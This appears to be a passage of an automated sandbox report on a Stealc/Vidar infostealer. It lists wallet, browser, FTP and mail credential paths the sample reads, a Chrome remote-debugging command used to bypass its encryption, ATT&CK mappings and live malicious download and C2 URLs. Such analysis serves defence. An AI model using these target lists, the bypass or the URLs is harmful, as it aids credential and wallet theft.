Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2722572353.0000000000B82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\Documents\DGCAAFBFBK.exe

Directory queried: C:\Users\user\Documents

Jump to behavior

Source: Yara match	File source: 0.2.file.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: file.exe PID: 7484, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2722572353.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2720322383.0000000000521000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7484, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7484, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB40C40 sqlite3_bind_zeroblob,	0_2_6CB40C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB40D60 sqlite3_bind_parameter_name,	0_2_6CB40D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA68EA0 sqlite3_clear_bindings,	0_2_6CA68EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB40B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6CB40B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA66410 bind,WSAGetLastError,	0_2_6CA66410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA660B0 listen,WSAGetLastError,	0_2_6CA660B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA6C030 sqlite3_bind_parameter_count,	0_2_6CA6C030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA66070 PR_Listen,	0_2_6CA66070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA6C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6CA6C050
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B2EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,	23_2_00B2EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B2DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,	23_2_00B2DF51

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	12 Process Injection	3 Obfuscated Files or Information	Security Account Manager	12 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Scheduled Task/Job	11 Software Packing	NTDS	236 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	751 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	261 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	261 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	47%	ReversingLabs	Win32.Infostealer.Tinba
file.exe	49%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\Documents\DGCAAFBFBK.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\JoYUT4N[1].exe	100%	Avira	HEUR/AGEN.1360153
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	100%	Avira	HEUR/AGEN.1360153
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\Documents\DGCAAFBFBK.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\JoYUT4N[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\JoYUT4N[1].exe	18%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	18%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://185.215.113.206/68b591d6548ec281/vcruntime140.dllO	100%	Avira URL Cloud	malware
http://31.41.244.11/files/7995533987/JoYUT4N.exeHFsp	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpe1daae79862fa0ab8ea5ae274af5Extension	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/nss3.dll/	100%	Avira URL Cloud	malware
http://subca.ocsp-certum.com02	0%	Avira URL Cloud	safe
http://subca.ocsp-certum.com01	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.php1012911001	100%	Avira URL Cloud	malware
http://31.41.244.11/files/7995533987/JoYUT4N.exeshqos.dll	100%	Avira URL Cloud	malware
http://www.certum.pl/CPS0	0%	Avira URL Cloud	safe
http://31.41.244.11/files/7995533987/JoYUT4N.exe	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/msvcp140.dllu	100%	Avira URL Cloud	malware
http://31.41.244.11/files/7995533987/JoYUT4N.exeXYZ0123456789	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpTE	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/nss3.dll/	20%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www3.l.google.com	142.250.181.142	true	false	high
plus.l.google.com	142.250.181.78	true	false	high
play.google.com	172.217.19.206	true	false	high
www.google.com	142.250.181.68	true	false	high
ogs.google.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll	false	high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	false	high
http://185.215.113.206/	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
http://185.215.113.16/mine/random.exe	false	high
http://185.215.113.206/68b591d6548ec281/sqlite3.dll	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239381714324_1EWZXOYRPJQHWBKEX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
http://185.215.113.43/Zu7JuNko/index.php	false	high
http://185.215.113.206/68b591d6548ec281/freebl3.dll	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239340418540_1UQTKN6JO04LNXB5Q&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false	high
http://185.215.113.206/68b591d6548ec281/mozglue.dll	false	high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false	high
http://185.215.113.206/68b591d6548ec281/msvcp140.dll	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239340418539_1KFG8UNZE5MUR2Y24&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
http://185.215.113.206/c4becf79229cb002.php	false	high
https://www.google.com/async/newtab_promos	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239340418552_1AAPCBWXWYRQF23F9&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239381714323_11S06446Z442STKF6&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://www.google.com/async/ddljson?async=ntp:2	false	high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	KFCFBAAE.0.dr	false		high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dllO	file.exe, 00000000.00000002.2748285132.0000000023052000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.phpY	skotes.exe, 00000017.00000002.3389127239.000000000128C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.certum.pl/ctsca2021.crl0o	skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, KFCFBAAE.0.dr	false		high
http://www.broofa.com	chromecache_175.6.dr	false		high
http://31.41.244.11/files/7995533987/JoYUT4N.exeHFsp	skotes.exe, 00000017.00000002.3389127239.000000000125E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/68b591d6548ec281/nss3.dll/	file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpe1daae79862fa0ab8ea5ae274af5Extension	file.exe, 00000000.00000002.2720322383.00000000005EC000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, KFCFBAAE.0.dr	false		high
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	file.exe, 00000000.00000002.2748285132.00000000230C5000.00000004.00000020.00020000.00000000.sdmp, FHJDGHIJDGCBAAAAAFIJ.0.dr	false		high
https://www.google.com	chromecache_175.6.dr	false		high
http://185.215.113.206/c4becf79229cb002.phpy	file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	false		high
